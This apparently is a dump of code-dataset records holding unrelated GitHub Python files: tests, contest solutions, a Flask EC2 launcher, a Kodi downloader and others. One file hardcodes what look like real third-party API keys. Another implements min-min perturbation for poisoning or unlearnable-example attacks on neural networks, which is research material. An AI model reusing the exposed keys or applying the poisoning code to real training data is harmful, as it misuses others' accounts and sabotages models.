test_hash_of_fortran_array_is_the_same_as_c_array():\n c = np.asarray(np.arange(6000).reshape((1000, 2, 3)), order='C')\n f = np.asarray(np.arange(6000).reshape((1000, 2, 3)), order='F')\n\n assert hash(c) == hash(f)\n\n\ndef test_hashing_of_functions():\n\n def foo(a, b):\n return a + b\n\n assert hash(foo) == hash(foo)\n\n\ndef test_hashing_of_artifacts_and_proxies(repo):\n\n @p.provenance()\n def load_data():\n return [1, 2, 3]\n\n original_proxy = load_data()\n original_artifact = original_proxy.artifact\n loaded_artifact = repo.get_by_id(original_artifact.id)\n loaded_proxy = loaded_artifact.proxy()\n\n # All artifacts should have the same hash\n assert hash(original_artifact) == hash(loaded_artifact)\n\n # All proxies should have the same hash\n assert hash(original_proxy) == hash(loaded_proxy)\n\n # All values should have the same hash\n assert hash(original_artifact.value) == hash(loaded_artifact.value)\n\n # Artifacts and proxies should not have the same hash\n assert hash(original_artifact) != hash(original_proxy)\n\n # Proxies and values should have the same hash\n assert hash(original_proxy) == hash(original_artifact.value)\n\n\ndef test_hashing_with_artifact_hasher_also_returns_iter_of_artifacts_preserves_hash(repo,):\n\n @p.provenance()\n def load_data():\n return [1, 2, 3]\n\n @p.provenance()\n def create_composite(data):\n return {'foo': 'bar', 'data': data}\n\n data = load_data()\n\n original_proxy = create_composite(data)\n original_artifact = original_proxy.artifact\n loaded_artifact = repo.get_by_id(original_artifact.id)\n loaded_proxy = loaded_artifact.proxy()\n\n expected_proxy_ids = frozenset((original_artifact.id, data.artifact.id))\n expected_artifact_ids = frozenset((original_artifact.id,))\n\n original_proxy_hash, artifacts = hash(original_proxy, hasher=ah.artifact_hasher())\n ids = frozenset(a.id for a in artifacts)\n assert original_proxy_hash == hash(original_proxy)\n assert ids == expected_proxy_ids\n\n original_artifact_hash, artifacts = hash(original_artifact, hasher=ah.artifact_hasher())\n ids = frozenset(a.id for a in artifacts)\n assert original_artifact_hash == hash(original_artifact)\n assert ids == expected_artifact_ids\n\n loaded_artifact_hash, artifacts = hash(loaded_artifact, hasher=ah.artifact_hasher())\n ids = frozenset(a.id for a in artifacts)\n assert loaded_artifact_hash == hash(loaded_artifact)\n assert ids == expected_artifact_ids\n\n loaded_proxy_hash, artifacts = hash(loaded_proxy, hasher=ah.artifact_hasher())\n ids = frozenset(a.id for a in artifacts)\n assert loaded_proxy_hash == hash(loaded_proxy)\n assert ids == expected_proxy_ids\n","repo_name":"bmabey/provenance","sub_path":"tests/provenance/test_hashing.py","file_name":"test_hashing.py","file_ext":"py","file_size_in_byte":4048,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"67"} +{"seq_id":"33201246057","text":"import sys\nreader = (s.rstrip() for s in sys.stdin)\ninput = reader.__next__\nimport math\nfrom functools import reduce\n\ndef factors(n): \n return set(reduce(list.__add__, \n ([i, n//i] for i in range(1, int(n**0.5) + 1) if n % i == 0)))\n\ndef countit(lst,lenr):\n n=len(lst)\n counter=0\n if lenr>n:\n return 0\n else:\n subcounter=0\n for i in range(n):\n if lst[i]==1:\n subcounter+=1 \n else:\n if subcounter>=lenr:\n counter+=(subcounter-lenr+1)\n subcounter=0\n if i==n-1:\n if subcounter>=lenr:\n counter+=(subcounter-lenr+1)\n return counter\n#print(countit([1,1,1,1],3))\n \nif __name__ == '__main__':\n n,m,k = list(map(int,input().split()))\n a1=list(map(int,input().split()))\n a2=list(map(int,input().split()))\n## res=[]\n## for i in range(n):\n## res.append(list(map(lambda x:x*a1[i],a2)))\n## print(res)\n factk=list(factors(k))\n factk.sort()\n recdimen=[]\n for ele in factk:\n if ele<=(k**0.5):\n recdimen.append([ele,k//ele])\n else:\n break\n res=0\n #print(recdimen)\n for dima,dimb in recdimen:\n ta1,ta2=countit(a1,dima),countit(a2,dimb)\n tb1,tb2=countit(a2,dima),countit(a1,dimb)\n\n if dima==dimb:\n res+=(ta1*ta2)\n else:\n res+=(ta1*ta2+tb1*tb2)\n print(res)\n","repo_name":"marcus-aurelianus/codeforce","sub_path":"round626/subrect.py","file_name":"subrect.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"8279323973","text":"import csv\n\n\ndef write_data_in_Data(filename):\n\n with open(filename, 'w') as file:\n\n file.write(','.join(titles)) # объединение кортежа заголовков в строку через ','\n\n for line in data:\n line = [str(i) for i in line]\n line = ','.join(line)\n file.write(line) # объединение кортежей данных в строки через ','\n file.write('\\n')\n\ndef insert(line):\n if line not in data:\n data.append(line)\n\ndef new_line_in_data():\n\n new_line = tuple(input('Введите данные: ').split())\n\n if new_line not in data:\n data.append(new_line)\n\ndef read_from_Data(filename):\n\n with open(filename, 'r') as file:\n\n titles = tuple(file.readline().split(','))\n data = []\n\n for line in file:\n line = tuple(line.split(','))\n data.append(line)\n\n return titles, data\n\nglobal data, titles\n\ntitles = ('User_Number', 'Nickname')\ndata = []\n\ntitles, data = read_from_Data('New_Data_Base.csv')\n\nnew_line_in_data()\n\nwrite_data_in_Data('New_Data_Base.csv')\n\nprint(data)","repo_name":"KirillBikbaev/Another_Student_Repo","sub_path":"New_Data_Base.py","file_name":"New_Data_Base.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"41525149641","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# author: raosiwei\n# date: 2016-01-23\n\nimport sys\nsys.path.append(\"./src\")\nimport iData,iCalculate,iAnalysis\n\nidata = iData.iData(\"./conf\", \"./log\", \"./data\")\nidata.dataProcessing()\n\nical = iCalculate.iCalculate(\"./conf\", \"./log\")\nical.calIndicators()\n\nianaly = iAnalysis.iAnalysis(\"./conf\", \"./log\")\nianaly.runAnalysis()\n\n","repo_name":"rouseway/iStock","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71313747093","text":"# web frameworks\nfrom flask import Flask\nfrom to_get_instances import Ec2Services\nfrom flask import request, jsonify\nimport json\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return \"Hello World\"\n\n# POST http://127.0.0.1:5000/startec2\n# Request Headers\n# Content-Type: application/json\n# User-Agent: PostmanRuntime/7.26.8\n# Accept: */*\n# Postman-Token: f5a46fc4-c97a-4689-be9f-063798d0563b\n# Host: 127.0.0.1:5000\n# Accept-Encoding: gzip, deflate, br\n# Connection: keep-alive\n# Request Body\n# {\"name\":\"kuna\"}\n@app.route('/startec2', methods=['POST'])\ndef start_instance():\n record = json.loads(request.data)\n print(record.get(\"name\", \"user hasn't given name\"))\n trigger_aws = Ec2Services(\"name\", \"filter\")\n instance_id = trigger_aws.create_ec2_instance()\n json_response = {\"instance_id\": str(instance_id.id)}\n return jsonify(json_response)\n\n\n\nif __name__ == \"__main__\":\n app.debug = True\n app.run()","repo_name":"girwarkishor/python-devops","sub_path":"class27/flask_tutorial.py","file_name":"flask_tutorial.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"5720550237","text":"from selenium import webdriver\ndriver=webdriver.Chrome()\ndriver.get(\"https://www.facebook.com/\")\ndriver.maximize_window()\ndriver.implicitly_wait(30)\n\n# ele_val=driver.find_element_by_id(\"email\").get_attribute(\"data-testid\")\n# print(ele_val)\n# print(type(ele_val))\n\nele_val=driver.find_element_by_xpath(\"//*[@class='login_form_label_field']/div/a\").text\nprint(ele_val)\nprint(type(ele_val))\n","repo_name":"ruhig24/PythonPractice1111","sub_path":"get_attribute.py","file_name":"get_attribute.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"42573316353","text":"import numpy as np\nimport torch\nfrom torch.autograd import Variable\ndevice = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\nimport options\nargs = options.options()\n\nfrom estimation import grad_estimator\n\nclass PerturbationTool():\n def __init__(self, seed=0, epsilon=0.03137254901, num_steps=20, step_size=0.00784313725):\n self.epsilon = epsilon\n self.num_steps = num_steps\n self.step_size = step_size\n self.seed = seed\n np.random.seed(seed)\n\n def random_noise(self, noise_shape=[20, 3, 32, 32]):\n random_noise = torch.FloatTensor(*noise_shape).uniform_(-self.epsilon, self.epsilon).to(device)\n return random_noise\n\n def min_min_attack(self, images, labels, model, optimizer, criterion, ZO_method=False, random_noise=None, sample_wise=False):\n if random_noise is None:\n random_noise = torch.FloatTensor(*images.shape).uniform_(-self.epsilon, self.epsilon).to(device)\n\n perturb_img = Variable(images.data + random_noise, requires_grad=True)\n perturb_img = Variable(torch.clamp(perturb_img, 0, 1), requires_grad=True)\n eta = random_noise\n for _ in range(self.num_steps):\n opt = torch.optim.SGD([perturb_img], lr=1e-3)\n opt.zero_grad()\n model.zero_grad()\n \n if ZO_method:\n mu = 0.01 #smoothing parameter\n q = 10 #no of random directions\n estimator = grad_estimator(model, labels, images.shape)\n \n images = images.view(args.batch_size, -1)\n d = args.batch_size*images.shape[1]\n perturb_img_grad = estimator.grad_est(images, mu, q, d)\n\n else:\n if isinstance(criterion, torch.nn.CrossEntropyLoss):\n if hasattr(model, 'classify'):\n model.classify = True\n logits = model(perturb_img)\n loss = criterion(logits, labels)\n else:\n logits, loss = criterion(model, perturb_img, labels, optimizer)\n perturb_img.retain_grad()\n loss.backward()\n perturb_img_grad = perturb_img.grad.data\n\n\n eta = self.step_size * perturb_img_grad.sign() * (-1) \n perturb_img = Variable(perturb_img.data + eta, requires_grad=True) # torch.Size([512, 3, 32, 32])\n \n images.data = images.data.reshape(perturb_img.data.shape)\n eta = torch.clamp(perturb_img.data - images.data, -self.epsilon, self.epsilon)\n perturb_img = Variable(images.data + eta, requires_grad=True)\n perturb_img = Variable(torch.clamp(perturb_img, 0, 1), requires_grad=True)\n\n return perturb_img, eta\n \n","repo_name":"ABravoCode/Practical-Targeted-Clean-Label-Poisoning-Attacks-on-Deep-Neural-Nets","sub_path":"Pertubation.py","file_name":"Pertubation.py","file_ext":"py","file_size_in_byte":2788,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"14972850969","text":"from typing import Any, Callable, Dict\n\n\nclass memoize(object):\n def __init__(self, func: Callable[[int, int], int]):\n self.func = func\n self.cache: Dict[int, Dict[int, int]] = dict()\n\n def __call__(self, *args: Any, **kwds: Any) -> Any:\n m: int = args[0]\n n: int = args[1]\n if m in self.cache:\n if n in self.cache[m]:\n return self.cache[m][n]\n else:\n self.cache[m] = dict()\n value = self.func(m, n)\n self.cache[m][n] = value\n return value\n\n\n@memoize\ndef gridTraveller(m: int, n: int):\n if m <= 0 or n <= 0:\n return 0\n if m == 1 and n == 1:\n return 1\n return (gridTraveller(m - 1, n) + gridTraveller(m, n - 1))\n\n\nprint(gridTraveller(18, 18))\n","repo_name":"chakri68/leetcode","sub_path":"DynamicProgramming/gridTraveller.py","file_name":"gridTraveller.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"17922675523","text":"# -*- coding: UTF-8 -*-\n\n# last edit:\n# 2023-03-20\n\nimport re\nimport json\nimport os, sys\nimport inspect\nimport xbmc, xbmcgui, xbmcvfs\ntry:\n from urlparse import urlparse, parse_qsl\n from urllib import quote_plus, unquote_plus\n from urllib2 import Request, urlopen\nexcept ImportError:\n from urllib.parse import urlparse, quote_plus, parse_qsl, unquote_plus\n from urllib.request import Request, urlopen\n\ndef download(name, image, url, subfolder=None): # new\n if url == None: return\n\n from resources.lib import control\n\n try: headers = dict(parse_qsl(url.rsplit('|', 1)[1]))\n except: headers = dict('')\n\n url = url.split('|')[0]\n content = re.compile('(.+?)\\sS(\\d*)E\\d*$').findall(name)\n\n if int(xbmc.getInfoLabel(\"System.BuildVersion\").split(\".\")[0]) >= 19:\n table = str.maketrans('', '', '\\/:*?\"<>|')\n transname = name.translate(table).strip('.')\n else:\n transname = name.translate(None, '\\/:*?\"<>|').strip('.')\n\n transname = transname.replace(' ', '_') # new\n\n levels =['../../../..', '../../..', '../..', '..']\n\n if len(content) == 0:\n dest = control.getSetting('download.movie.path', False)\n dest = control.translatePath(dest)\n for level in levels:\n try: control.makeFile(os.path.abspath(os.path.join(dest, level)))\n except: pass\n if not control.makeFile(dest):\n xbmcgui.Dialog().ok(name, dest + '[CR]ERROR - Server | Verzeichnis[CR]Download fehlgeschlagen')\n return\n\n # new\n if subfolder != None:\n dest = os.path.join(dest, subfolder)\n\n # if subfolder == None:\n # dest = os.path.join(dest, transname)\n # else:\n # dest = os.path.join(dest, subfolder)\n\n if not control.makeFile(dest):\n xbmcgui.Dialog().ok(name, dest + '[CR]ERROR - Server | Verzeichnis[CR]Download fehlgeschlagen')\n return\n else:\n dest = control.getSetting('download.tv.path', False)\n dest = control.translatePath(dest)\n for level in levels:\n try: control.makeFile(os.path.abspath(os.path.join(dest, level)))\n except: pass\n if not control.makeFile(dest):\n xbmcgui.Dialog().ok(name, dest + '[CR]ERROR - Server | Verzeichnis[CR]Download fehlgeschlagen')\n return\n\n if int(xbmc.getInfoLabel(\"System.BuildVersion\").split(\".\")[0]) >= 19:\n table = str.maketrans('', '', '\\/:*?\"<>|')\n transtvshowtitle = content[0][0].translate(table).strip('.')\n else:\n transtvshowtitle = content[0][0].translate(None, '\\/:*?\"<>|').strip('.')\n\n dest = os.path.join(dest, transtvshowtitle)\n if not control.makeFile(dest):\n xbmcgui.Dialog().ok(name, dest + '[CR]ERROR - Server | Verzeichnis[CR]Download fehlgeschlagen')\n return\n dest = os.path.join(dest, 'Season %01d' % int(content[0][1]))\n if not control.makeFile(dest):\n xbmcgui.Dialog().ok(name, dest + '[CR]ERROR - Server | Verzeichnis[CR]Download fehlgeschlagen')\n return\n\n ext = os.path.splitext(urlparse(url).path)[1][1:]\n if not ext in ['mp4', 'mkv', 'flv', 'avi', 'mpg']: ext = 'mp4'\n dest = os.path.join(dest, transname + '.' + ext)\n\n sysheaders = quote_plus(json.dumps(headers))\n sysurl = quote_plus(url)\n systitle = quote_plus(name)\n sysimage = quote_plus(image)\n sysdest = quote_plus(dest)\n script = inspect.getfile(inspect.currentframe())\n cmd = 'RunScript(%s, %s, %s, %s, %s, %s)' % (script, sysurl, sysdest, systitle, sysimage, sysheaders)\n xbmc.executebuiltin(cmd)\n\n\ndef getResponse(url, headers, size):\n try:\n if size > 0:\n size = int(size)\n headers['Range'] = 'bytes=%d-' % size\n\n req = Request(url, headers=headers)\n\n resp = urlopen(req, timeout=30)\n return resp\n except:\n return None\n\n\ndef done(title, dest, downloaded):\n playing = xbmc.Player().isPlaying()\n\n text = xbmcgui.Window(10000).getProperty('GEN-DOWNLOADED')\n\n if len(text) > 0:\n text += '[CR]'\n\n if downloaded:\n text += '%s : %s' % (dest.rsplit(os.sep)[-1], '[COLOR forestgreen]Download erfolgreich[/COLOR]')\n else:\n text += '%s : %s' % (dest.rsplit(os.sep)[-1], '[COLOR red]Download fehlgeschlagen[/COLOR]')\n\n xbmcgui.Window(10000).setProperty('GEN-DOWNLOADED', text)\n\n if (not downloaded) or (not playing): \n xbmcgui.Dialog().ok(title, text)\n xbmcgui.Window(10000).clearProperty('GEN-DOWNLOADED')\n\n\ndef doDownload(url, dest, title, image, headers):\n headers = json.loads(unquote_plus(headers))\n url = unquote_plus(url)\n title = unquote_plus(title)\n image = unquote_plus(image)\n dest = unquote_plus(dest)\n file = dest.rsplit(os.sep, 1)[-1]\n\n resp = getResponse(url, headers, 0)\n\n if not resp:\n xbmcgui.Dialog().ok(title, dest + '[CR]Download fehlgeschlagen[CR]Keine Antwort vom Server')\n return\n\n try: content = int(resp.headers['Content-Length'])\n except: content = 0\n\n try: resumable = 'bytes' in resp.headers['Accept-Ranges'].lower()\n except: resumable = False\n\n #print \"Download Header\"\n #print resp.headers\n #if resumable: print(\"Download is resumable\")\n\n if content < 1:\n xbmcgui.Dialog().ok(title, file + ' Unbekannte Dateigröße[CR]Download nicht möglich')\n return\n\n size = 1024 * 1024\n mb = content / (1024 * 1024)\n\n if content < size:\n size = content\n\n total = 0\n notify = 0\n errors = 0\n count = 0\n resume = 0\n sleep = 0\n\n if int(xbmc.getInfoLabel(\"System.BuildVersion\").split(\".\")[0]) >= 19:\n if xbmcgui.Dialog().yesno('Download - ' + title, '%s[CR]Dateigröße %dMB[CR]Weiter mit Download?' % (file, mb) , 'Weiter', 'Abbrechen') == 1: return\n else:\n if xbmcgui.Dialog().yesno('Download - ' + title, file, 'Dateigröße %dMB' % mb, 'Weiter mit Download?', 'Weiter', 'Abbrechen') == 1: return\n\n #print('Download File Size : %dMB %s ' % (mb, dest))\n\n #f = open(dest, mode='wb')\n f = xbmcvfs.File(dest, 'w')\n\n chunks = []\n while True:\n downloaded = total\n for c in chunks:\n downloaded += len(c)\n percent = min(100 * downloaded / content, 100)\n if percent >= notify:\n # xbmc.executebuiltin( \"Notification(%s,%s,%i,%s)\" % ( str(int(percent))+'%' + ' - ' + title, dest, 5000, image))\n xbmcgui.Dialog().notification(str(int(percent))+'%' + ' - ' + title, dest, image, 5000, False)\n #print('Download percent : %s %s %dMB downloaded : %sMB File Size : %sMB' % (str(int(percent))+'%', dest, mb, downloaded / 1000000, content / 1000000))\n notify += 20\n\n chunk = None\n error = False\n\n try: \n chunk = resp.read(size)\n if not chunk:\n if percent < 99:\n error = True\n else:\n while len(chunks) > 0:\n c = chunks.pop(0)\n f.write(c)\n del c\n\n f.close()\n #print('%s download complete' % (dest))\n return done(title, dest, True)\n\n except Exception as e:\n #print(str(e))\n error = True\n sleep = 10\n errno = 0\n\n if hasattr(e, 'errno'):\n errno = e.errno\n\n if errno == 10035: # 'A non-blocking socket operation could not be completed immediately'\n pass\n\n if errno == 10054: #'An existing connection was forcibly closed by the remote host'\n errors = 10 #force resume\n sleep = 30\n\n if errno == 11001: # 'getaddrinfo failed'\n errors = 10 #force resume\n sleep = 30\n\n if chunk:\n errors = 0\n chunks.append(chunk)\n if len(chunks) > 5:\n c = chunks.pop(0)\n f.write(c)\n total += len(c)\n del c\n\n if error:\n errors += 1\n count += 1\n #print('%d Error(s) whilst downloading %s' % (count, dest))\n xbmc.sleep(sleep*1000)\n\n if (resumable and errors > 0) or errors >= 10:\n if (not resumable and resume >= 50) or resume >= 500:\n #Give up!\n #print('%s download canceled - too many error whilst downloading' % (dest))\n return done(title, dest, False)\n\n resume += 1\n errors = 0\n if resumable:\n chunks = []\n #create new response\n #print('Download resumed (%d) %s' % (resume, dest))\n resp = getResponse(url, headers, total)\n else:\n #use existing response\n pass\n\n\nif __name__ == '__main__':\n if 'downloader.py' in sys.argv[0]:\n doDownload(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5])\n\n\n","repo_name":"kasi45/plugin.video.mediathekviewweb","sub_path":"resources/lib/downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":9046,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"41813899695","text":"from ising_model import *\n\ndef kernel():\n arr = np.zeros((11, 11))\n kernel = make_dist_kernel(arr, 1., )\n\n test = np.arange(11 * 11).reshape((11, 11))\n n_grid = np.array(test.shape)\n\n plt.matshow(test)\n plt.show()\n\n plt.matshow(kernel)\n plt.show()\n\n y, x = 10, 3\n\n test[x, y] = 200\n\n n_kernel = np.array(kernel.shape)\n stencil = np.nonzero(kernel) # - n_kernel // 2\n\n offsets = np.array([x, y]) - n_kernel // 2\n stencil = tuple([idxs + offset for idxs, offset in zip(stencil, offsets)])\n print(stencil)\n stencil = np.ravel_multi_index(stencil, test.shape, mode=\"wrap\")\n print(stencil)\n\n np.put(test, stencil, v=150)\n plt.matshow(test)\n plt.show()\n neighbour_spins = np.take(test, stencil)\n print(neighbour_spins)\n\n stencil = np.nonzero(kernel)\n offsets = np.array([x, y]) - n_kernel // 2\n _stencil = [idxs + offset for idxs, offset in zip(stencil, offsets)]\n\n print(_stencil)\n\n __stencil = [idxs % max_idx for idxs, max_idx in zip(_stencil, n_grid)]\n\n __stencil = __stencil[0] * n_grid[0] + __stencil[1]\n\n print(__stencil)\n\n # __stencil = (_stencil[0] % (n_grid[0] - 1)) * n_grid[0] + (_stencil[1] % (n_grid[1] - 1)) * n_grid[1]\n neighbour_spins = np.take(test, __stencil)\n\n print(neighbour_spins)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nif __name__ == \"__main__\":\n kernel()\n","repo_name":"lwelzel/ising-model","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"7194721488","text":"import requests\n\nprint(\"Please enter your Origin and Destination ?\")\nuserinput1=input(\"Enter your Origin: \");\nuserinput2=input(\"Enter your Destination: \");\n\nurl = \"https://travelpayouts-travelpayouts-flight-data-v1.p.rapidapi.com/v1/prices/cheap\"\n\nquerystring = {\"destination\":userinput1,\"origin\":userinput2,\"currency\":\"USD\",\"page\":\"None\"}\n\nheaders = {\n 'x-rapidapi-host': \"travelpayouts-travelpayouts-flight-data-v1.p.rapidapi.com\",\n 'x-rapidapi-key': \"83a69214c6msh70b62fd60e4fd1ep1a3f19jsn6b278bdadb79\",\n 'x-access-token': \"a4dd61ae0300a50da722075244ad7089\"\n }\n\nresponse = requests.get(url, headers=headers, params=querystring)\n\n\nprint(response.text)","repo_name":"nscharan1/API-s","sub_path":"FLIGHTINFO.py","file_name":"FLIGHTINFO.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"3619208317","text":"#!/usr/bin/env python\n\nimport os, logging, argparse, re\nimport pandas as pd\nimport numpy as np\n\ndef getFiles(directory, prefix, suffix):\n fileList = []\n for f in os.listdir(os.path.abspath(directory)):\n fname, fext = os.path.splitext(f)\n if (f.startswith(prefix)) and (fext == ('.' + suffix)):\n fileList.append(f)\n return(fileList)\n\n\ndef makeTable(fileList):\n fileNestedList = []\n fileTable = pd.DataFrame()\n rule = re.compile('[RI][1-2]')\n for f in fileList:\n fname, fext = os.path.splitext(f)\n key = rule.search(f)\n short = f.replace(key.group(),\"\")\n row = {'filename' : f,\n 'type' : key.group(),\n 'shortname' : short}\n fileNestedList.append(row)\n fileTable = pd.DataFrame(fileNestedList)\n return(fileTable)\n\n\ndef checkDf(df):\n max_row, max_col = df.shape\n cols = df.columns.tolist()\n data = ['none' for i in range(max_row)]\n if len(cols) < 4:\n missing = list(set(['R1', 'R2', 'I1', 'I2']) - set(cols))\n for i in missing:\n if i == 'R1':\n df.insert(0, 'R1', data)\n elif i == 'R2':\n df.insert(1, 'R2', data)\n elif i == 'I1':\n df.insert(2, 'I1', data)\n elif i == 'I2':\n df.insert(3, 'I2', data)\n return(df)\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description = 'Make a list of the files to run in batch mode')\n parser.add_argument('-d', '--directory', metavar='', required=True, help = 'Specify the path to your files')\n parser.add_argument('-p', '--prefix', metavar='', required=True, help = 'A prefix that identifies the files you want to run')\n parser.add_argument('-x', '--extension', metavar='', required=True, help = 'An extension that your files have, e.g. .gz (NOT .gz)')\n\n args = parser.parse_args()\n\n LOG_FORMAT = \"%(levelname)s %(asctime)s - %(message)s\"\n logging.basicConfig(filename = os.path.abspath(args.directory) + '/make_file.log', format = LOG_FORMAT, level = logging.DEBUG)\n logger = logging.getLogger()\n\n logger.info(f\"Arguments passed: prefix = {args.prefix}, extension = {args.extension}\")\n logger.info(f\"Retrieving files that start with {args.prefix} and end with {args.extension}\")\n\n if args.directory == '.':\n directory = os.getcwd()\n else:\n directory = args.directory\n\n assert os.path.exists(directory), f\"Directory not found at {directory}\"\n logger.error(f\"Could not find the directory you specified: {directory}. Does it exist?\")\n\n filetypes = ['R1', 'R2', 'I1', 'I2']\n order = {key: i for i, key in enumerate(filetypes)}\n\n fileList = getFiles(directory, args.prefix, args.extension)\n fileTable = makeTable(fileList)\n finalTable = fileTable.reset_index(drop = True) \\\n \t\t\t .pivot(index = 'shortname', columns = 'type', values = 'filename') \\\n \t\t\t .sort_index(axis = 1, key = lambda x: x.map(order))\n\n outputTable = checkDf(finalTable)\n\n data = outputTable.values\n logger.info(f\"Added these files to HMAS QC batch file: {data}\")\n outfile = os.path.abspath(args.directory) + '/' + args.prefix + '.paired.files'\n logger.info(f\"Saving output to: {outfile}\")\n np.savetxt(outfile, data, delimiter = '\\t', fmt = '%s')\n\n logger.info(f\"Completed. Please make sure {outfile} is correct before continuing.\") \n\n","repo_name":"jessicarowell/HMAS-QC-Pipeline","sub_path":"make_file.py","file_name":"make_file.py","file_ext":"py","file_size_in_byte":3410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"37812653815","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.home, name=\"home\"),\n path(\"list\", views.list, name=\"list\"),\n path(\"list/\", views.get_vegetable, name=\"get_vegetable\"),\n path(\"forecast\", views.forecast, name=\"forecast\"),\n path(\"todays-tasks\", views.todays_tasks, name=\"todays-tasks\"),\n]\n","repo_name":"toquothty/garden-planner-django","sub_path":"config/garden/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"14141264443","text":"import numpy as np\n\nfrom discretizer import GridDiscretizer\nfrom misc import Cropper, ClipRange, MinMaxScaler, ToTensor\n\ntry:\n import torch\n from autoencoders.autoencoders import AutoEncoder, VAE, DiscreteLatentVAE, VectorQuantizedVAE, GumbelVAE\nexcept ImportError:\n pass\n\n\nMAX_RANGE = 16.0\nMIN_RANGE = 0.3\nCLIP_RANGE = 2.0\nLEVELS = 4\nSIZE = 4\nGRIDS = 1\n\n\nclass FeaturesMixin(object):\n def __init__(self,\n size = SIZE,\n crop = None,\n **kwargs):\n self.size = size\n self.cropper = Cropper(crop)\n\n def __call__(self, x):\n z = self.get_features(x)\n return z\n\n def sample(self):\n try:\n z_sample = np.random.randn(self.levels, size=self.size)\n except:\n z_sample = np.random.randn(self.size)\n return z_sample\n\n\nclass GridFeatures(FeaturesMixin):\n def __init__(self,\n levels=LEVELS,\n size=SIZE,\n crop=None,\n min_range=MIN_RANGE,\n max_range=MAX_RANGE,\n clip_range=CLIP_RANGE,\n **kwargs):\n super(GridFeatures, self).__init__(size=size, crop=crop)\n self.grid = GridDiscretizer(randomize_bins=False,\n levels=levels,\n size=size,\n enumerate=False,\n crop=crop,\n min_range=min_range,\n max_range=max_range,\n clip_range=clip_range)\n\n def get_features(self, x):\n z = self.grid(x)\n return z\n\n\nclass TileCodingFeatures(FeaturesMixin):\n def __init__(self,\n grids=GRIDS,\n levels=LEVELS,\n size=SIZE,\n crop=None,\n min_range=MIN_RANGE,\n max_range=MAX_RANGE,\n clip_range=CLIP_RANGE,\n **kwargs):\n super(TileCodingFeatures, self).__init__(size=size, crop=crop)\n self.size = levels**size\n self.grids = [GridDiscretizer(randomize_bins=i,\n levels=levels,\n size=size,\n enumerate=True,\n crop=crop,\n min_range=min_range,\n max_range=max_range,\n clip_range=clip_range) for i in range(grids)]\n\n def get_features(self, x):\n z = np.zeros(self.size)\n for i, grid in enumerate(self.grids):\n z[grid(x)] += 1.0\n return z\n\n\nclass AEFeatures(FeaturesMixin):\n def __init__(self,\n path,\n levels=LEVELS,\n size=SIZE,\n crop=None,\n min_range=MIN_RANGE,\n max_range=MAX_RANGE,\n clip_range=CLIP_RANGE,\n **kwargs):\n super(AEFeatures, self).__init__(size=size, crop=crop)\n self.model = torch.load(path, map_location=lambda storage, loc: storage).eval()\n\n if isinstance(self.model, VectorQuantizedVAE):\n size = self.model.n_latents\n levels = self.model.categorical_dim\n elif isinstance(self.model, GumbelVAE):\n size = self.model.latent_dim\n levels = self.model.categorical_dim\n elif isinstance(self.model, AutoEncoder):\n size = self.model.latent_dim\n else:\n raise ValueError(\"Model can only be either VQ-VAE or Gumbel-VAE.\")\n\n assert self.size == size, \"Loaded model latent size ({}) not consistent with feature size ({})\".format(size, self.size)\n if isinstance(self.model, DiscreteLatentVAE):\n assert kwargs[\"levels\"] == levels, \"Loaded model categorical dimension ({}) not consistent with provided feature levels ({})\".format(levels, kwargs[\"levels\"])\n assert int(self.cropper.size*2.0) == self.model.input_dim, \"Loaded model input dimension ({}) not consistent with feature input dimension ({})\".format(self.model.input_dim, int(self.cropper.size*2.0))\n\n self.clipper = ClipRange(clip=clip_range, maximum=max_range)\n self.scaler = MinMaxScaler(clip=clip_range, maximum=max_range)\n self.torcher = ToTensor()\n\n def get_features(self, x):\n x_cropped = self.cropper(x)\n x_clipped = self.clipper(x_cropped)\n x_scaled = self.scaler(x_clipped)\n x_tensor = self.torcher(x_scaled)\n if isinstance(self.model, VAE):\n z, _ = model.encode(x_tensor)\n elif isinstance(self.model, AutoEncoder):\n z = model.encode(x_tensor)\n return z.detach().numpy().reshape(self.size)\n\n\n###################### REMEMBER TO CHANGE RACHID'S CODE TO A PROPER CLASS HERE !!!!!!!!!!!!!!!!!!!!!\nclass RandomFeatures(FeaturesMixin):\n def __init__(self, **kwargs):\n super(RandomFeatures, self).__init__(**kwargs)\n\n def get_features(self, x):\n z = x\n return z\n\n\nclass Features(FeaturesMixin):\n def __init__(self, features_type, **kwargs):\n super(Features, 